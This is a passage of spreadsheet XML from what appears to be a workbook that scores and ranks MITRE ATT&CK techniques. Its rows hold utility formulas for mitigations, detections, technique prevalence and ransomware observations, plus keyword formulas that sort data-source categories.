      </c>
      <c r="AL498" s="37">
        <v>494</v>
      </c>
      <c r="AM498" s="37" t="str" cm="1">
        <f t="array" ref="AM498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD498)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN498" s="37">
        <v>0</v>
      </c>
      <c r="AO498" s="37">
        <v>2</v>
      </c>
      <c r="AP498" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ498" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>197.69993723809523</v>
      </c>
      <c r="AR498" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS498" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT498" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU49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9.4619017732426283</v>
      </c>
    </row>
    <row r="499" spans="1:47" ht="34">
      <c r="A499" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B499" s="37">
        <f t="shared" si="7"/>
        <v>528.26676100000009</v>
      </c>
      <c r="C499" s="37" t="s">
        <v>1736</v>
      </c>
      <c r="D499" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E499" s="37" t="s">
        <v>1737</v>
      </c>
      <c r="F499" s="37">
        <v>1</v>
      </c>
      <c r="G499" s="37">
        <v>1</v>
      </c>
      <c r="H499" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I499" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J499" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K499" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L499" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M499" s="37">
        <v>0</v>
      </c>
      <c r="N499" s="56">
        <v>0</v>
      </c>
      <c r="O499" s="56">
        <v>1</v>
      </c>
      <c r="P499" s="56">
        <v>0</v>
      </c>
      <c r="Q499" s="56">
        <v>0</v>
      </c>
      <c r="R499" s="57" t="s">
        <v>1738</v>
      </c>
      <c r="S499" s="57">
        <v>4</v>
      </c>
      <c r="T499" s="57" t="s">
        <v>1739</v>
      </c>
      <c r="U499" s="57">
        <v>13</v>
      </c>
      <c r="V499" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.16666671428571431</v>
      </c>
      <c r="W499" s="37">
        <v>17</v>
      </c>
      <c r="X499" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y499" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z499" s="37">
        <v>1</v>
      </c>
      <c r="AA499" s="37">
        <v>0.01</v>
      </c>
      <c r="AB499" s="37">
        <v>0.01</v>
      </c>
      <c r="AC499" s="37"/>
      <c r="AD499" s="50" t="s">
        <v>1730</v>
      </c>
      <c r="AE499" s="37" t="str" cm="1">
        <f t="array" ref="AE499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD499)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF499" s="37">
        <v>495</v>
      </c>
      <c r="AG499" s="37" t="str" cm="1">
        <f t="array" ref="AG499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD499)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH499" s="37">
        <v>495</v>
      </c>
      <c r="AI499" s="37" t="str" cm="1">
        <f t="array" ref="AI499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD499)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ499" s="37">
        <v>495</v>
      </c>
      <c r="AK499" s="37" t="str" cm="1">
        <f t="array" ref="AK499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD499)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL499" s="37">
        <v>495</v>
      </c>
      <c r="AM499" s="37" t="str" cm="1">
        <f t="array" ref="AM499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD499)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN499" s="37">
        <v>0</v>
      </c>
      <c r="AO499" s="37">
        <v>0</v>
      </c>
      <c r="AP499" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ499" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>176.08892033333336</v>
      </c>
      <c r="AR499" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS499" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT499" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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00" spans="1:47" ht="51">
      <c r="A500" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B500" s="37">
        <f t="shared" si="7"/>
        <v>671.11904761904771</v>
      </c>
      <c r="C500" s="37" t="s">
        <v>1740</v>
      </c>
      <c r="D500" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E500" s="37" t="s">
        <v>1741</v>
      </c>
      <c r="F500" s="37">
        <v>1</v>
      </c>
      <c r="G500" s="37">
        <v>1</v>
      </c>
      <c r="H500" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I500" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J500" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K500" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L500" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M500" s="37">
        <v>0</v>
      </c>
      <c r="N500" s="56">
        <v>0</v>
      </c>
      <c r="O500" s="56">
        <v>2</v>
      </c>
      <c r="P500" s="56">
        <v>3</v>
      </c>
      <c r="Q500" s="56">
        <v>1</v>
      </c>
      <c r="R500" s="57" t="s">
        <v>1742</v>
      </c>
      <c r="S500" s="57">
        <v>10</v>
      </c>
      <c r="T500" s="57" t="s">
        <v>1743</v>
      </c>
      <c r="U500" s="57">
        <v>12</v>
      </c>
      <c r="V500" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523814</v>
      </c>
      <c r="W500" s="37">
        <v>22</v>
      </c>
      <c r="X500" s="37">
        <v>0.4</v>
      </c>
      <c r="Y500" s="37">
        <v>0.4</v>
      </c>
      <c r="Z500" s="37">
        <v>6</v>
      </c>
      <c r="AA500" s="37">
        <v>0.06</v>
      </c>
      <c r="AB500" s="37">
        <v>0.06</v>
      </c>
      <c r="AC500" s="37"/>
      <c r="AD500" s="50" t="s">
        <v>1744</v>
      </c>
      <c r="AE500" s="37" t="str" cm="1">
        <f t="array" ref="AE500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD500)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF500" s="37">
        <v>496</v>
      </c>
      <c r="AG500" s="37" t="str" cm="1">
        <f t="array" ref="AG500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD500)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH500" s="37">
        <v>496</v>
      </c>
      <c r="AI500" s="37" t="str" cm="1">
        <f t="array" ref="AI500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD500)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ500" s="37">
        <v>496</v>
      </c>
      <c r="AK500" s="37" t="str" cm="1">
        <f t="array" ref="AK500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD500)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL500" s="37">
        <v>496</v>
      </c>
      <c r="AM500" s="37" t="str" cm="1">
        <f t="array" ref="AM500">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD500)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN500" s="37">
        <v>0</v>
      </c>
      <c r="AO500" s="37">
        <v>0</v>
      </c>
      <c r="AP500" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ500" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>223.70634920634924</v>
      </c>
      <c r="AR500" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS500" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT500" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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01" spans="1:47" ht="51">
      <c r="A501" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B501" s="37">
        <f t="shared" si="7"/>
        <v>359.91438042857141</v>
      </c>
      <c r="C501" s="37" t="s">
        <v>1745</v>
      </c>
      <c r="D501" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E501" s="37" t="s">
        <v>1746</v>
      </c>
      <c r="F501" s="37">
        <v>1</v>
      </c>
      <c r="G501" s="37">
        <v>1</v>
      </c>
      <c r="H501" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I501" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J501" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K501" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L501" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M501" s="37">
        <v>0</v>
      </c>
      <c r="N501" s="56">
        <v>1</v>
      </c>
      <c r="O501" s="56">
        <v>1</v>
      </c>
      <c r="P501" s="56">
        <v>3</v>
      </c>
      <c r="Q501" s="56">
        <v>0</v>
      </c>
      <c r="R501" s="57" t="s">
        <v>742</v>
      </c>
      <c r="S501" s="57">
        <v>2</v>
      </c>
      <c r="T501" s="57" t="s">
        <v>1747</v>
      </c>
      <c r="U501" s="57">
        <v>4</v>
      </c>
      <c r="V501" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.0952428571428564E-2</v>
      </c>
      <c r="W501" s="37">
        <v>6</v>
      </c>
      <c r="X501" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y501" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z501" s="37">
        <v>5</v>
      </c>
      <c r="AA501" s="37">
        <v>0.05</v>
      </c>
      <c r="AB501" s="37">
        <v>0.05</v>
      </c>
      <c r="AC501" s="37"/>
      <c r="AD501" s="50" t="s">
        <v>1748</v>
      </c>
      <c r="AE501" s="37" t="str" cm="1">
        <f t="array" ref="AE501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD501)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF501" s="37">
        <v>497</v>
      </c>
      <c r="AG501" s="37" t="str" cm="1">
        <f t="array" ref="AG501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD501)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH501" s="37">
        <v>497</v>
      </c>
      <c r="AI501" s="37" t="str" cm="1">
        <f t="array" ref="AI501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD501)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ501" s="37">
        <v>497</v>
      </c>
      <c r="AK501" s="37" t="str" cm="1">
        <f t="array" ref="AK501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD501)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL501" s="37">
        <v>497</v>
      </c>
      <c r="AM501" s="37" t="str" cm="1">
        <f t="array" ref="AM501">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD501)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN501" s="37">
        <v>0</v>
      </c>
      <c r="AO501" s="37">
        <v>0</v>
      </c>
      <c r="AP501" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ501" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>119.97146014285714</v>
      </c>
      <c r="AR501" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS501" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT501" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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02" spans="1:47" ht="34">
      <c r="A502" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B502" s="37">
        <f t="shared" si="7"/>
        <v>692.80428738095236</v>
      </c>
      <c r="C502" s="37" t="s">
        <v>1749</v>
      </c>
      <c r="D502" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E502" s="37" t="s">
        <v>1750</v>
      </c>
      <c r="F502" s="37">
        <v>1</v>
      </c>
      <c r="G502" s="37">
        <v>1</v>
      </c>
      <c r="H502" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I502" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J502" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K502" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L502" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M502" s="37">
        <v>0</v>
      </c>
      <c r="N502" s="56">
        <v>1</v>
      </c>
      <c r="O502" s="56">
        <v>1</v>
      </c>
      <c r="P502" s="56">
        <v>0</v>
      </c>
      <c r="Q502" s="56">
        <v>0</v>
      </c>
      <c r="R502" s="57" t="s">
        <v>1751</v>
      </c>
      <c r="S502" s="57">
        <v>9</v>
      </c>
      <c r="T502" s="57" t="s">
        <v>1752</v>
      </c>
      <c r="U502" s="57">
        <v>16</v>
      </c>
      <c r="V502" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24761880952380952</v>
      </c>
      <c r="W502" s="37">
        <v>25</v>
      </c>
      <c r="X502" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y502" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z502" s="37">
        <v>2</v>
      </c>
      <c r="AA502" s="37">
        <v>0.02</v>
      </c>
      <c r="AB502" s="37">
        <v>0.02</v>
      </c>
      <c r="AC502" s="37"/>
      <c r="AD502" s="50" t="s">
        <v>1753</v>
      </c>
      <c r="AE502" s="37" t="str" cm="1">
        <f t="array" ref="AE502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD502)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF502" s="37">
        <v>498</v>
      </c>
      <c r="AG502" s="37" t="str" cm="1">
        <f t="array" ref="AG502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD502)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH502" s="37">
        <v>498</v>
      </c>
      <c r="AI502" s="37" t="str" cm="1">
        <f t="array" ref="AI502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD502)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ502" s="37">
        <v>498</v>
      </c>
      <c r="AK502" s="37" t="str" cm="1">
        <f t="array" ref="AK502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD502)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL502" s="37">
        <v>498</v>
      </c>
      <c r="AM502" s="37" t="str" cm="1">
        <f t="array" ref="AM502">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD502)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN502" s="37">
        <v>0</v>
      </c>
      <c r="AO502" s="37">
        <v>0</v>
      </c>
      <c r="AP502" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ502" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>230.93476246031744</v>
      </c>
      <c r="AR502" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS502" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT502" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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03" spans="1:47" ht="34">
      <c r="A503" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B503" s="37">
        <f t="shared" si="7"/>
        <v>703.70428642857144</v>
      </c>
      <c r="C503" s="37" t="s">
        <v>1754</v>
      </c>
      <c r="D503" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E503" s="37" t="s">
        <v>1755</v>
      </c>
      <c r="F503" s="37">
        <v>1</v>
      </c>
      <c r="G503" s="37">
        <v>1</v>
      </c>
      <c r="H503" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I503" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J503" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K503" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L503" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M503" s="37">
        <v>0</v>
      </c>
      <c r="N503" s="56">
        <v>2</v>
      </c>
      <c r="O503" s="56">
        <v>0</v>
      </c>
      <c r="P503" s="56">
        <v>0</v>
      </c>
      <c r="Q503" s="56">
        <v>1</v>
      </c>
      <c r="R503" s="57" t="s">
        <v>1751</v>
      </c>
      <c r="S503" s="57">
        <v>9</v>
      </c>
      <c r="T503" s="57" t="s">
        <v>1752</v>
      </c>
      <c r="U503" s="57">
        <v>16</v>
      </c>
      <c r="V503" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25238071428571429</v>
      </c>
      <c r="W503" s="37">
        <v>25</v>
      </c>
      <c r="X503" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y503" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z503" s="37">
        <v>3</v>
      </c>
      <c r="AA503" s="37">
        <v>0.03</v>
      </c>
      <c r="AB503" s="37">
        <v>0.03</v>
      </c>
      <c r="AC503" s="37"/>
      <c r="AD503" s="50" t="s">
        <v>1308</v>
      </c>
      <c r="AE503" s="37" t="str" cm="1">
        <f t="array" ref="AE503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD503)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF503" s="37">
        <v>499</v>
      </c>
      <c r="AG503" s="37" t="str" cm="1">
        <f t="array" ref="AG503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD503)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH503" s="37">
        <v>499</v>
      </c>
      <c r="AI503" s="37" t="str" cm="1">
        <f t="array" ref="AI503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD503)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ503" s="37">
        <v>499</v>
      </c>
      <c r="AK503" s="37" t="str" cm="1">
        <f t="array" ref="AK503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD503)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL503" s="37">
        <v>499</v>
      </c>
      <c r="AM503" s="37" t="str" cm="1">
        <f t="array" ref="AM503">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD503)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN503" s="37">
        <v>0</v>
      </c>
      <c r="AO503" s="37">
        <v>0</v>
      </c>
      <c r="AP503" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ503" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>234.56809547619048</v>
      </c>
      <c r="AR503" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS503" s="37">
